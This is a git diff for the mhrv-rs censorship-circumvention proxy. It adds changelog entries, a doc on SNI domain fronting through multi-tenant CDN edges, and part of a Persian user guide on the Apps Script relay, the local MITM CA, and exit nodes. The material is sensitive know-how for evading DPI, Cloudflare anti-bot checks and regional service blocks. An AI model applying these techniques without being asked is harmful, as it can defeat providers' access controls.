+  - **Watcher tasks تحت `select!` cancellation leak می‌کرد:** `wait_for_any_drainable` فقط در trailing loop watcher‌ها رو abort می‌کرد — past همه cancel point‌ها. با تبدیل phase-2 wait به `select!`، loser arm's future drop می‌شه و watcher‌هاش *detach* می‌شن (drop کردن `JoinHandle` abort نمی‌کنه). هر orphan یک `Arc<...Inner>` نگه می‌داشت + می‌توانست `notify_one()` permit از batch بعدی بدزده. fix: `AbortOnDrop` newtype روی همه `JoinHandle` watcher.
+  ۲ test جدید + 35/35 pass.
+• Example config exit-node با `aistudio.google.com` و `ai.google.dev` — درخواست از [#701](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/701). AI Studio روی Iran IP sanction می‌خوره (نه Apps Script طرف ما). مقصد IP exit node رو می‌بینه که نه Iran است نه Google datacenter.
+• Example config fronting-groups با Reddit / Fastly / Pinterest / CNN / BuzzFeed family domains اضافه شد (PR [#696](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/696) از @Shjpr9). همه روی Fastly Anycast 151.101.x.x — کاربران می‌تونن از example بیشتر دامنه برداشت کنن، اونی که در شبکه‌شان کار می‌کنه نگه دارن.
+• تست: ۱۷۹ lib + ۳۵ tunnel-node test همه pass.
+---
+• Fix Android `~2-second-delayed` crash on Disconnect from v1.9.8 ([#700](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/700) by @ilok67 with full root cause + fix): despite the v1.9.8 fix for the lifecycle race (#666), a separate crash inside `MhrvVpnService.teardown()` remained. Old order was tun2proxy.stop → tun.close → join → Native.stopProxy. Problem: tun2proxy's worker thread is blocked in native code on a socket read from the proxy's SOCKS5 port. After `Tun2proxy.stop()`'s 2s timeout and the 4s thread join both expire (worker still alive), `Native.stopProxy()` shuts down the Rust runtime — including the listener socket — and the worker, still reading from that socket in native code, hits use-after-free → SIGSEGV. The old code comment claimed "the runtime shutdown will knock the rest of the world over," which was wrong: `Native.stopProxy` cannot forcibly terminate a separate native thread. New order: **`Native.stopProxy` FIRST** (closes the socket → worker's blocking read returns with EOF/error → worker exits cleanly through its error path), then `Tun2proxy.stop` (cooperative, mostly redundant but cheap), `tun.close`, then `join` (almost always immediate now). Thanks @ilok67 again for the precise root-cause work on the second crash.
+• Fix tunnel-node batch drain correctness + lock contention (PR [#695](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/695) from @dazzling-no-more): four bugs, two correctness + two latency.
+  - **Cleanup race dropped tail bytes:** when a session's read buffer > 16 MiB and upstream signaled EOF, `drain_now` correctly returned `eof=false` and left the tail for the next poll, but the cleanup loop read the raw atomic, saw `true`, removed the session, aborted `reader_task`, dropped the tail. Cleanup now tracks eof'd sids from `drain_now`'s return value — the session is only removed once the drain that returned `eof=true` has shipped to the client. Silent data loss on 1Gbps+ VPS that filled the buffer between polls — fixed.
+  - **Sessions-map lock held across upstream awaits:** phase-1 `data` op held the global sessions map across `last_active.lock`, `writer.lock`, `write_all`, and `flush` — head-of-line-blocking every other batch and connect/close op. Now (mirroring `udp_data`'s already-correct shape) it clones the `Arc` under the map lock, drops the lock, then awaits.
+  - **Mixed TCP+UDP batch paid the slower side's deadline:** `tokio::join!(wait_tcp, wait_udp)` is conjunctive — a TCP-ready burst still paid the UDP `LONGPOLL_DEADLINE` (15 s) before responding. Comment said "either side", code did "both sides". Switched to `tokio::select!`. New test `batch_tcp_ready_does_not_pay_udp_longpoll_deadline` locks down the regression.
+  - **Watcher tasks leaked under `select!` cancellation:** `wait_for_any_drainable` only aborted its watcher tasks in a trailing loop, past every cancellation point. With phase-2 wait flipped to `select!`, the loser arm's future drops and *detaches* its watchers (dropping a `JoinHandle` doesn't abort). Each orphan held an `Arc<...Inner>` and could steal a `notify_one()` permit from a future batch. Fix: `AbortOnDrop` newtype wraps every watcher `JoinHandle`.
+  2 new tests + 35/35 pass.
+• Example config exit-node now lists `aistudio.google.com` and `ai.google.dev` — requested in [#701](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/701). AI Studio sanctions Iran IPs (independently of any Apps Script issue on our side). Routing it through the exit-node makes the destination see the exit node's IP, which is neither Iran nor a Google datacenter.
+• Example config fronting-groups gained Reddit / Fastly / Pinterest / CNN / BuzzFeed family domains (PR [#696](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/696) from @Shjpr9). All on the Fastly Anycast `151.101.x.x` edge — gives users a richer starter list to trim down based on what works in their network.
+• Tests: 179 lib + 35 tunnel-node tests all passing.
diff --git a/docs/fronting-groups.md b/docs/fronting-groups.md
new file mode 100644
index 00000000..ac57c230
--- /dev/null
+++ b/docs/fronting-groups.md
@@ -0,0 +1,143 @@
+# Multi-edge fronting groups
+
+The default mhrv-rs SNI-rewrite path targets Google's edge: TLS goes out
+with `SNI=www.google.com` to a Google IP, the inner `Host` header (after
+the local MITM CA terminates the browser's TLS) names the real
+destination, and Google's frontend routes by `Host`. That's how
+`www.youtube.com`, `script.google.com`, and friends reach you despite a
+DPI box that drops anything not SNI'd as `www.google.com`.
+
+The same trick works on any multi-tenant CDN edge that:
+
+1. serves multiple tenant domains on the same IP pool, and
+2. dispatches to the right backend by inner HTTP `Host`, and
+3. presents a TLS cert whose name matches the SNI you choose.
+
+Vercel, Fastly, and AWS CloudFront (which is what Netlify-hosted sites
+sit behind) all fit the bill. Pick a benign-looking domain hosted on
+the same edge, use it as the SNI, and you can route many other domains
+on that edge through the same tunnel without burning Apps Script quota.
+
+## Config shape
+
+```jsonc
+{
+  "mode": "direct",                         // or apps_script / full
+  "fronting_groups": [
+    {
+      "name":    "vercel",                  // free-form, used in logs
+      "ip":      "76.76.21.21",             // a Vercel edge IP
+      "sni":     "react.dev",               // a Vercel-hosted domain
+      "domains": [                          // hosts to route via this group
+        "vercel.com", "vercel.app",
+        "nextjs.org", "now.sh"
+      ]
+    }
+  ]
+}
+```
+
+`domains` matches case-insensitively, exact OR dot-anchored suffix —
+`vercel.com` covers both `vercel.com` and `*.vercel.com`. First group
+in the list whose member matches wins.
+
+A working example is shipped at `config.fronting-groups.example.json`.
+
+## Picking the (ip, sni) pair
+
+The SNI must be a real, currently-live domain on the same edge. rustls
+validates the upstream cert against the SNI you send; if the edge
+returns a cert that doesn't cover that name, the handshake fails. So
+the recipe is:
+
+1. Pick the target edge (Vercel, Fastly, …).
+2. Find a neutral, never-blocked domain hosted there. Vercel: `react.dev`,
+   `nextjs.org`. Fastly: `www.python.org`, `pypi.org`. AWS CloudFront
+   (where Netlify lives): `letsencrypt.org`, `aws.amazon.com`.
+3. Resolve that domain (`dig +short react.dev A`) — pick one IP, drop
+   it in `ip`.
+4. List the domains you actually want to reach via this edge in
+   `domains` — **only domains you've verified are hosted on the same
+   edge as `sni`** (see warning below).
+
+Edge IPs rotate. If a group's `ip` stops working, re-resolve the SNI
+domain and update the config — IP rotation per-group is on the
+roadmap but not implemented yet.
+
+## ⚠️ Cross-tenant leak: don't list domains that aren't on the edge
+
+If you put a domain in `domains` that is **not** actually hosted on the
+edge you've configured, two things happen, both bad:
+
+1. **Privacy leak.** The proxy completes a TLS handshake with the edge
+   (validated against `sni`, which IS on the edge), then sends `Host:
+   <your-domain>` inside that encrypted stream. The edge — which is
+   not your-domain's host — now sees a request labelled with
+   your-domain's name. From the edge's perspective, *you* deliberately
+   sent that request to them. Vercel/Fastly logs will show your-domain
+   in their access logs, attributable to your IP and timestamps.
+
+2. **UX failure.** The edge has no backend for your-domain, so it
+   returns its default 404 / wrong-tenant page. The site appears
+   "broken via mhrv-rs" but works fine over a normal connection,
+   which is confusing to debug.
+
+**Verify before listing.** A simple check: if `dig +short your-domain
+A` returns an IP that's *also* one of the edge's IPs, you're fine. If
+the IPs differ, your-domain is hosted somewhere else and listing it
+will leak. This is also why the upstream MITM-DomainFronting Xray
+config uses `verifyPeerCertByName` with an explicit SAN allowlist —
+it's a second guard against accidentally fronting unrelated domains
+through the same edge. mhrv-rs leaves verification to rustls + the
+SNI you send; the leak guard is "you, the operator, listing only
+domains you've verified."
+
+Only listed domains are routed to the group. Anything else falls
+through to the next dispatch step (Google SNI-rewrite or Apps Script
+relay), so unrelated traffic does NOT accidentally hit a group's edge.
+
+## Routing precedence
+
+Within a single CONNECT, the dispatch order is:
+
+1. `passthrough_hosts` — explicit user opt-out.
+2. DoH bypass (port 443, known DoH host).
+3. `mode = full` — everything via the batch tunnel mux.
+4. **`fronting_groups` match (port 443).** — this feature.
+5. Built-in Google SNI-rewrite suffix list (port 443).
+6. `mode = direct` fallback → raw TCP.
+7. `mode = apps_script` peek + relay.
+
+So fronting groups beat the Google-edge default for hosts they list,
+but lose to user-explicit passthrough/DoH choices. Putting `vercel.com`
+in a Vercel fronting group will route Vercel traffic through Vercel's
+edge directly, not through the Apps Script relay or the Google edge.
+
+## Limitations / what's not here yet
+
+- **Single IP per group.** Real edges have many; we'll add a pool with
+  health-checking when there's a clear need. Workaround: when the
+  configured IP starts failing, swap it.
+- **No bundled domain catalog.** The upstream Xray config uses
+  `geosite:vercel` / `geosite:fastly` lists from a binary geosite
+  database — we don't ship that, you list domains explicitly.
+- **No UI editor.** Edit `config.json` directly. The UI's Save path
+  preserves your `fronting_groups` block (round-tripped) — it just
+  doesn't render an editor for it.
+- **Browsers only for Android non-root**, same as the Google path —
+  third-party apps that don't trust user CAs (Telegram, Instagram, …)
+  can't be MITM'd, so this trick doesn't help them.
+- **Cert verification matches the SNI.** No per-group SAN allowlist
+  (their `verifyPeerCertByName`); the SNI you send IS what rustls
+  validates against. If you want stricter pinning, set `verify_ssl:
+  false` is the wrong answer — instead, pick an SNI whose cert
+  genuinely covers your targets.
+
+## Credit
+
+The technique is the same one [@masterking32]'s original
+MasterHttpRelayVPN demonstrated for Google's edge. The Vercel +
+Fastly extension and the matching Xray config came from
+[@patterniha]'s [MITM-DomainFronting](https://github.com/patterniha/MITM-DomainFronting)
+project — this `fronting_groups` field is a Rust port of that idea
+into mhrv-rs's existing dispatcher.
diff --git a/docs/guide.fa.md b/docs/guide.fa.md
new file mode 100644
index 00000000..3e95ffc5
--- /dev/null
+++ b/docs/guide.fa.md
@@ -0,0 +1,447 @@
+<div dir="rtl">
+
+# mhrv-rs — راهنمای کامل
+
+این نسخهٔ کامل و فنی است — همهٔ گزینه‌های کانفیگ، همهٔ حالت‌های پیشرفته، همهٔ راه‌های رفع اشکال. برای راه‌اندازی ۵ دقیقه‌ای، [README اصلی](../README.md) را ببین.
+
+[English version](guide.md)
+
+## فهرست
+
+- [نگاه دقیق به نحوهٔ کارکرد](#نگاه-دقیق-به-نحوهٔ-کارکرد)
+- [پلتفرم‌ها و فایل‌های اجرایی](#پلتفرم‌ها-و-فایل‌های-اجرایی)
+- [محل ذخیرهٔ فایل‌ها](#محل-ذخیرهٔ-فایل‌ها)
+- [دیپلوی Apps Script](#دیپلوی-apps-script)
+  - [نسخهٔ Cloudflare Worker (سریع‌تر)](#نسخهٔ-cloudflare-worker)
+  - [حالت direct (وقتی ISP خود `script.google.com` را بسته)](#حالت-direct)
+- [مرجع CLI](#مرجع-cli)
+  - [حالت scan-ips با API](#حالت-scan-ips-با-api)
+- [تلگرام با xray](#تلگرام-با-xray)
+- [حالت تونل کامل](#حالت-تونل-کامل)
+  - [تأثیر تعداد Deployment](#تأثیر-تعداد-deployment)
+  - [راه‌اندازی سریع](#راه‌اندازی-سریع-حالت-full)
+- [Exit node — برای ChatGPT / Claude / Grok](#exit-node)
+- [اشتراک‌گذاری از طریق هات‌اسپات](#اشتراک‌گذاری-هات‌اسپات)
+- [اجرا روی OpenWRT](#اجرا-روی-openwrt)
+- [ابزارهای تشخیص](#ابزارهای-تشخیص)
+  - [ویرایشگر SNI pool](#ویرایشگر-sni-pool)
+- [چه چیز پیاده شده و چه چیز نه](#چه-چیز-پیاده-شده-و-چه-چیز-نه)
+- [محدودیت‌های شناخته‌شده](#محدودیت‌های-شناخته‌شده)
+- [امنیت](#امنیت)
+- [سؤالات رایج](#سؤالات-رایج)
+
+## نگاه دقیق به نحوهٔ کارکرد
+
+```
+مرورگر / تلگرام / xray
+        |
+        | HTTP proxy (8085)  یا  SOCKS5 (8086)
+        v
+mhrv-rs (محلی)
+        |
+        | TLS به IP گوگل، SNI = www.google.com
+        v                       ^
+   DPI می‌بیند: www.google.com   |
+        |                       | Host: script.google.com (داخل TLS)
+        v                       |
+  لبهٔ گوگل ----------------------+
+        |
+        v
+  رلهٔ Apps Script (حساب رایگان شما)
+        |
+        v
+  مقصد واقعی
+```
+
+DPI سانسورگر فقط SNI داخل TLS را می‌بیند و اجازه می‌دهد `www.google.com` رد شود. لبهٔ گوگل هم `www.google.com` و هم `script.google.com` را روی یک IP سرو می‌کند و بر اساس هدر HTTP `Host` داخل تونل رمزشده آن‌ها را تفکیک می‌کند.
+
+برای دامنه‌های متعلق به گوگل (`google.com`, `youtube.com`, `fonts.googleapis.com`, …) همان تونل مستقیم استفاده می‌شود — بدون رلهٔ Apps Script. این کار سهمیهٔ هر-fetch را دور می‌زند و مشکل قفل‌بودنِ User-Agent روی `Google-Apps-Script` را برای آن سایت‌ها برطرف می‌کند. برای اضافه کردن دامنه‌های دیگر از فیلد `hosts` در `config.json` استفاده کن.
+
+## پلتفرم‌ها و فایل‌های اجرایی
+
+لینوکس (x86_64، aarch64)، مک (x86_64، aarch64)، ویندوز (x86_64)، **اندروید ۷.۰ به بالا** (APK جهانی شامل arm64، armv7، x86_64، x86). فایل‌های آماده در [صفحهٔ releases](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases).
+
+**اندروید:** فایل `mhrv-rs-android-universal-v*.apk` را دانلود کن. راهنمای کامل در [docs/android.fa.md](android.fa.md) (فارسی) یا [docs/android.md](android.md) (انگلیسی). نسخهٔ اندروید همان `mhrv-rs` Rust دسکتاپ را اجرا می‌کند (از طریق JNI) به‌علاوهٔ پل TUN با `tun2proxy` تا تمام برنامه‌های دستگاه بدون نیاز به تنظیم per-app از پروکسی رد شوند.
+
+> **نکتهٔ مهم اندروید (issueهای [#74](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/74) و [#81](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/81)):** TUN تمام ترافیک IP را می‌گیرد، اما HTTPS از برنامه‌های third-party فقط برای برنامه‌هایی کار می‌کند که به CAهای نصب‌شدهٔ کاربر اعتماد می‌کنند. از اندروید ۷ به بعد، برنامه‌ها باید با `networkSecurityConfig` صراحتاً اعلام کنند. **کروم و فایرفاکس می‌کنند**؛ **تلگرام، واتس‌اَپ، اینستاگرام، یوتیوب، برنامه‌های بانکی، بازی‌ها** نمی‌کنند. برای آن‌ها: حالت `PROXY_ONLY` و در داخل برنامه `127.0.0.1:1081` (SOCKS5)، یا حالت `google_only` (بدون CA، فقط سرویس‌های گوگل)، یا `upstream_socks5` به یک VPS خارجی. این طراحی امنیتی اندروید است نه باگ این برنامه.
+
+### محتوای هر release
+
+هر آرشیو شامل:
+
+| فایل | کاربرد |
+|---|---|
+| `mhrv-rs` / `mhrv-rs.exe` | CLI. استفادهٔ headless، سرور، اتوماسیون. روی مک / ویندوز بدون وابستگی سیستمی. |
+| `mhrv-rs-ui` / `mhrv-rs-ui.exe` | UI دسکتاپ (egui). فرم کانفیگ، دکمه‌های Start / Stop / Test، آمار زنده، پنل log. |
+| `run.sh` / `run.command` / `run.bat` | راه‌انداز پلتفرم: گواهی MITM را نصب می‌کند (نیاز به sudo / admin) و UI را باز می‌کند. در اولین اجرا از این استفاده کن. |
+
+آرشیوهای مک شامل `mhrv-rs.app` (در `*-app.zip`) هم هستند — در Finder دو بار کلیک کن. یک‌بار `mhrv-rs --install-cert` یا `run.command` را اجرا کن تا CA نصب شود.
+
+<p align="center"><img src="ui-screenshot.png" alt="UI دسکتاپ mhrv-rs شامل فرم کانفیگ، آمار ترافیک زنده، دکمه‌های Start/Stop/Test و پنل log" width="420"></p>
+
+UI لینوکس به این کتابخانه‌ها نیاز دارد: `libxkbcommon`, `libwayland-client`, `libxcb`, `libgl`, `libx11`, `libgtk-3`. روی اکثر توزیع‌های دسکتاپی از قبل نصب‌اند؛ روی سیستم headless یا با package manager نصب کن یا از CLI استفاده کن.
+
+## محل ذخیرهٔ فایل‌ها
+
+کانفیگ و گواهی MITM در دایرکتوری user-data سیستم‌عامل قرار می‌گیرند:
+
+- مک: `~/Library/Application Support/mhrv-rs/`
+- لینوکس: `~/.config/mhrv-rs/`
+- ویندوز: `%APPDATA%\mhrv-rs\`
+
+داخل آن دایرکتوری:
+
+- `config.json` — تنظیمات تو (با دکمهٔ Save در UI نوشته می‌شود یا دستی)
+- `ca/ca.crt`, `ca/ca.key` — گواهی root MITM. کلید خصوصی فقط در دست توست.
+
+CLI همچنین برای سازگاری با راه‌اندازی‌های قدیمی، روی `./config.json` در دایرکتوری جاری هم fallback دارد.
+
+## دیپلوی Apps Script
+
+نسخهٔ ۵ دقیقه‌ای در [README اصلی](../README.md#مرحلهٔ-۱--ساخت-اسکریپت-گوگل-یک‌بار) است. این بخش به نسخه‌های جایگزین می‌پردازد.
+
+### نسخهٔ Cloudflare Worker
+
+یک نسخهٔ جایگزین در [`assets/apps_script/Code.cfw.gs`](../assets/apps_script/Code.cfw.gs) به‌همراه [`assets/cloudflare/worker.js`](../assets/cloudflare/worker.js) وجود دارد که Apps Script را به یک رلهٔ نازک تبدیل می‌کند و کار `fetch` واقعی را به یک Cloudflare Worker که خودت دیپلوی می‌کنی می‌سپارد. **سود روز اول:** کاهش تأخیر (~۱۰ تا ۵۰ میلی‌ثانیه روی لبهٔ CF در مقابل ۲۵۰ تا ۵۰۰ میلی‌ثانیه Apps Script — برای مرور وب و تلگرام محسوس).
+
+سهمیهٔ روزانهٔ ۲۰٬۰۰۰ `UrlFetchApp` را کاهش **نمی‌دهد**، چون امروز mhrv-rs همیشه درخواست تک‌URL می‌فرستد؛ مسیر دسته‌ای روی GAS+Worker سیم‌کشی شده (`ceil(N/40)` سهمیه به‌ازای دستهٔ N) ولی هیچ کلاینتی فعلاً تولیدش نمی‌کند.
+
+**مبادلات:**
+- ویدیوی طولانی یوتیوب بدتر است (دیوار ۳۰ ثانیه به جای ۶ دقیقه)
+- ضدبات Cloudflare را حل نمی‌کند
+- **با `mode: "full"` سازگار نیست** (پشتیبانی tunnel-ops ندارد → برای واتس‌اَپ / مسنجرها روی اندروید Full mode کمک نمی‌کند)
+
+راهنمای کامل و جدول مبادلات در [`assets/cloudflare/README.fa.md`](../assets/cloudflare/README.fa.md). در mhrv-rs هیچ تنظیمی تغییر نمی‌کند — همان `mode: "apps_script"`، همان `script_id`، همان `auth_key`.
+
+### حالت direct
+
+اگر ISP تو از قبل Apps Script (یا کل گوگل) را مسدود کرده، باید مرحلهٔ ۱ **اول** موفق شود — قبل از این‌که رله‌ای داشته باشی. mhrv-rs یک حالت `direct` دقیقاً برای این دارد — فقط تونل بازنویسی SNI، بدون رلهٔ Apps Script. (قبل از v1.9 نام `google_only` داشت — نام قدیمی هم پذیرفته می‌شود.)
+
+۱. فایل اجرایی را دانلود کن (طبق [مرحلهٔ ۲ در README](../README.md#مرحلهٔ-۲--دانلود-mhrv-rs))
+۲. فایل [`config.direct.example.json`](../config.direct.example.json) را در کنار فایل اجرا با نام `config.json` کپی کن — نه `script_id` نیاز است نه `auth_key`
+۳. `mhrv-rs serve` را اجرا کن و HTTP proxy مرورگرت را روی `127.0.0.1:8085` بگذار
+۴. در حالت `direct`، پروکسی فقط `*.google.com`، `*.youtube.com` و سایر میزبان‌های لبهٔ گوگل (به‌علاوهٔ هر [`fronting_groups`](fronting-groups.md) که تنظیم کرده باشی) را از تونل بازنویسی SNI رد می‌کند. بقیه راو می‌رود — هنوز رله‌ای در کار نیست.
+۵. حالا مرحلهٔ ۱ را در مرورگر انجام بده (اتصال به `script.google.com` با SNI فرونت می‌شود). `Code.gs` را دیپلوی کن، Deployment ID را کپی کن.
+۶. در UI / اپ اندروید / یا با ویرایش `config.json`، حالت را به `apps_script` برگردان، Deployment ID و auth key را پیست کن، و دوباره استارت کن.
+
+برای بررسی دسترسی قبل از استارت پروکسی: `mhrv-rs test-sni` دامنه‌های `*.google.com` را مستقیم تست می‌کند و فقط به `google_ip` و `front_domain` نیاز دارد.
+
+## مرجع CLI
+
+تمام کاری که UI می‌کند را CLI هم می‌کند. `config.example.json` را به `config.json` کپی کن:
+
+```json
+{
+  "mode": "apps_script",
+  "google_ip": "216.239.38.120",
+  "front_domain": "www.google.com",
+  "script_id": "PASTE_YOUR_DEPLOYMENT_ID_HERE",
+  "auth_key": "same-secret-as-in-code-gs",
+  "listen_host": "127.0.0.1",
+  "listen_port": 8085,
+  "socks5_port": 8086,
+  "log_level": "info",
+  "verify_ssl": true
+}
+```
+
+سپس:
+
+```bash
+./mhrv-rs                   # اجرای پروکسی (پیش‌فرض)
+./mhrv-rs test              # تست یک درخواست کامل
+./mhrv-rs scan-ips          # رتبه‌بندی IPهای گوگل بر اساس سرعت
+./mhrv-rs test-sni          # تست نام‌های SNI روی google_ip
+./mhrv-rs --install-cert    # نصب مجدد گواهی
+./mhrv-rs --remove-cert     # حذف کامل: trust store + پوشهٔ ca/
+./mhrv-rs --help
+```
+
+`--remove-cert` گواهی را از trust store سیستم پاک می‌کند، با بررسی نام تأیید می‌کند که حذف انجام شد، و پوشهٔ `ca/` روی دیسک را حذف می‌کند. پاک‌سازی NSS (فایرفاکس و کروم لینوکس) best-effort است: اگر `certutil` نباشد یا یکی از مرورگرها پایگاه داده NSS را قفل کرده باشد، ابزار راهنمای پاک‌سازی دستی نشان می‌دهد. `config.json` و دیپلوی Apps Script دست‌نخورده می‌مانند، پس CA تازه نیازی به دیپلوی مجدد `Code.gs` ندارد.
+
+`script_id` می‌تواند JSON array باشد: `["id1", "id2", "id3"]`.
+
+### حالت scan-ips با API
+
+به‌طور پیش‌فرض، `scan-ips` از یک لیست ثابت استفاده می‌کند. کشف پویای IP را در `config.json` فعال کن:
+
+```json
+{
+  "fetch_ips_from_api": true,
+  "max_ips_to_scan": 100,
+  "scan_batch_size": 100,
+  "google_ip_validation": true
+}
+```
+
+وقتی فعال است:
+- فایل `goog.json` را از API محدوده‌های IP عمومی گوگل می‌گیرد
+- CIDRها را به IP تک‌تک گسترش می‌دهد
+- به IPهای دامنه‌های معروف گوگل اولویت می‌دهد (google.com، youtube.com، …)
+- به‌طور تصادفی تا `max_ips_to_scan` کاندید انتخاب می‌کند (اولویت‌داران اول)
+- فقط کاندیدها را برای اتصال و اعتبارسنجی frontend تست می‌کند
+
+ممکن است IPهایی پیدا کنی که سریع‌تر از لیست ثابت‌اند، اما تضمینی نیست همه کار کنند.
+
+## تلگرام با xray
+
+رلهٔ Apps Script فقط HTTP request/response می‌فهمد، پس پروتکل‌های غیر-HTTP (MTProto تلگرام، IMAP، SSH، TCP خام) نمی‌توانند از آن رد شوند. بدون چیز دیگری، این جریان‌ها به fallback مستقیم TCP می‌خورند — یعنی واقعاً tunnel نشده‌اند، و ISP که تلگرام را بسته همچنان می‌بندد.
+
+**راه‌حل:** یک [xray](https://github.com/XTLS/Xray-core) (یا v2ray / sing-box) محلی با outbound VLESS / Trojan / Shadowsocks به VPS شخصی خودت اجرا کن، و mhrv-rs را با فیلد **Upstream SOCKS5** (یا کلید `upstream_socks5`) به SOCKS5 inbound آن xray وصل کن. وقتی تنظیم شد، جریان‌های TCP خام که از SOCKS5 listener mhrv-rs می‌آیند به xray → تونل واقعی زنجیر می‌شوند.
+
+```
+تلگرام  ┐                                                    ┌─ Apps Script ── HTTP/HTTPS
+        ├─ SOCKS5 :8086 ─┤ mhrv-rs ├─ بازنویسی SNI ───────── google.com, youtube.com, …
+مرورگر  ┘                                                    └─ upstream SOCKS5 ─ xray ── VLESS ── VPS تو   (تلگرام، IMAP، SSH، TCP خام)
+```
+
+قطعهٔ کانفیگ:
+
+```json
+{
+  "upstream_socks5": "127.0.0.1:50529"
+}
+```
+
+HTTP / HTTPS مثل قبل از Apps Script می‌رود (تغییری نمی‌کند)، تونل بازنویسی SNI برای `google.com` / `youtube.com` همچنان از هر دو دور می‌زند — یوتیوب به سرعت قبل می‌ماند و تلگرام هم تونل واقعی پیدا می‌کند.
+
+## حالت تونل کامل
+
+`"mode": "full"` **تمام** ترافیک را end-to-end از Apps Script و یک [tunnel-node](../tunnel-node/) راه دور رد می‌کند — بدون نیاز به نصب گواهی MITM. TCP به‌صورت سشن‌های پایدار تونل، و UDP از کلاینت‌های اندروید / TUN از طریق SOCKS5 `UDP ASSOCIATE` به tunnel-node که UDP واقعی را از سمت سرور منتشر می‌کند. مبادله: تأخیر بیشتر هر درخواست (هر بایت Apps Script → tunnel-node → مقصد می‌رود)، اما برای هر پروتکل و هر برنامه‌ای بدون نصب CA کار می‌کند.
+
+### تأثیر تعداد Deployment
+
+هر دور بَچ Apps Script حدود ۲ ثانیه طول می‌کشد. در Full mode، mhrv-rs یک **مالتی‌پلکسر بَچ پیپلاین‌شده** اجرا می‌کند که چند بَچ همزمان می‌فرستد بدون اینکه منتظر پاسخ قبلی بماند. هر Deployment ID (= یک حساب گوگل) حوضچهٔ همزمانی مخصوص خودش با **۳۰ درخواست فعال** دارد — مطابق سقف اجرای همزمان Apps Script per-account.
+
+```
+حداکثر همزمانی = ۳۰ × تعداد Deployment IDها
+```
+
+| Deployment | همزمانی | |
+|---|---|---|
+| ۱ | ۳۰ | یک حساب — برای مرور سبک کافی |
+| ۳ | ۹۰ | مناسب استفادهٔ روزانه |
+| ۶ | ۱۸۰ | توصیه‌شده برای استفادهٔ سنگین |
+| ۱۲ | ۳۶۰ | چند حساب — حداکثر توان |
+
+بیشتر Deployment = همزمانی بیشتر = تأخیر کمتر هر سشن. هر بَچ بین IDها چرخش می‌کند و بار به‌طور یکنواخت توزیع می‌شود، احتمال رسیدن به سقف سهمیهٔ یک Deployment کاهش می‌یابد.
+
+**محافظ‌های منابع:**
+- **حداکثر ۵۰ op** در هر بَچ — اگر سشن‌های فعال بیشتر باشند، مالتی‌پلکسر چند بَچ می‌فرستد
+- **سقف payload ۴ مگابایت** در هر بَچ — خیلی کمتر از ۵۰ مگابایت Apps Script
+- **timeout ۳۰ ثانیه** هر بَچ — مقصد کند / مرده نمی‌تواند سایر سشن‌ها را گیر بیاندازد
+
+### راه‌اندازی سریع حالت full
+
+۱. [`CodeFull.gs`](../assets/apps_script/CodeFull.gs) را به‌عنوان Web App روی **هر حساب گوگل** دیپلوی کن (همان مراحل `Code.gs`، اما با اسکریپت full-mode که به tunnel-node تو forward می‌کند). یک Deployment per account — سقف ۳۰ همزمان per account است، چند Deployment روی یک حساب سهمیه را زیاد نمی‌کند. برای مقیاس، حساب‌های بیشتر:
+   - **استفادهٔ تنها** → ۱-۲ حساب
+   - **اشتراک با ~۳ نفر** → ۳ حساب
+   - **اشتراک با گروه** → یک حساب per کاربر سنگین
+
+۲. [tunnel-node](../tunnel-node/) را روی VPS دیپلوی کن. سریع‌ترین راه ایمیج Docker آماده:
+   ```bash
+   docker run -d --name mhrv-tunnel --restart unless-stopped \
+     -p 8080:8080 -e TUNNEL_AUTH_KEY=رمز_قوی_تو \
+     ghcr.io/therealaleph/mhrv-tunnel-node:latest
+   ```
+   Multi-arch (linux/amd64 + linux/arm64)، اجرا با کاربر غیر root، حدود ۳۲ مگابایت فشرده. برای production نسخهٔ مشخص (`:1.5.0`) را pin کن. راهنمای کامل (شامل Cloud Run، docker-compose، بیلد از سورس) در [tunnel-node/README.fa.md](../tunnel-node/README.fa.md).
+
+۳. در کانفیگت `"mode": "full"` با همهٔ Deployment IDها بگذار:
+   ```json
+   {
+     "mode": "full",
+     "script_id": ["id1", "id2", "id3", "id4", "id5", "id6"],
+     "auth_key": "secret-تو"
+   }
+   ```
+
+## Exit node
+
+سرویس‌های پشت Cloudflare (chatgpt.com، claude.ai، grok.com، x.com، openai.com) ترافیک از IPهای دیتاسنتر گوگل را به‌عنوان bot شناسایی می‌کنند و چالش Turnstile / CAPTCHA می‌فرستند. راه‌حل exit node یک handler کوچک TypeScript است که روی یک host serverless (Deno Deploy، fly.io، یا VPS شخصی خودت) دیپلوی می‌کنی و بین Apps Script و مقصد قرار می‌گیرد:
+
+```
+کلاینت → Apps Script (IP گوگل) → exit node خودت (IP غیر گوگل) → سایت پشت CF
+```
+
+مقصد IP خروجی exit node را می‌بیند نه IP گوگل، پس heuristic ضدبات شلیک نمی‌کند.
+
+**راه‌اندازی:** [`assets/exit_node/README.fa.md`](../assets/exit_node/README.fa.md). ۵ دقیقه، سهمیهٔ رایگان.
+
+## اشتراک‌گذاری هات‌اسپات
+
+mhrv-rs به‌طور پیش‌فرض روی `0.0.0.0` گوش می‌دهد، پس هر دستگاه روی همان شبکه می‌تواند ازش استفاده کند. سناریوی رایج: اشتراک تونل از گوشی اندروید به آیفون / آیپد / لپ‌تاپ از هات‌اسپات:
+
+۱. **اندروید:** هات‌اسپات موبایل را روشن کن + اپ را استارت کن
+۲. **دستگاه دیگر:** به Wi-Fi هات‌اسپات اندروید وصل شو
+۳. **پروکسی** را روی دستگاه دیگر تنظیم کن:
+   - سرور: `192.168.43.1` (IP پیش‌فرض هات‌اسپات اندروید)
+   - پورت: `8080` (HTTP) یا `1081` (SOCKS5)
+
+### iOS
+
+Settings → Wi-Fi → روی (i) شبکهٔ هات‌اسپات بزن → Configure Proxy → Manual → سرور `192.168.43.1`، پورت `8080`.
+
+برای پوشش سراسری در iOS، از [Shadowrocket](https://apps.apple.com/app/shadowrocket/id932747118) یا [Potatso](https://apps.apple.com/app/potatso/id1239860606) استفاده کن — به SOCKS5 (`192.168.43.1:1081`) وصلش کن، تمام ترافیک از تونل می‌رود.
+
+### مک / ویندوز
+
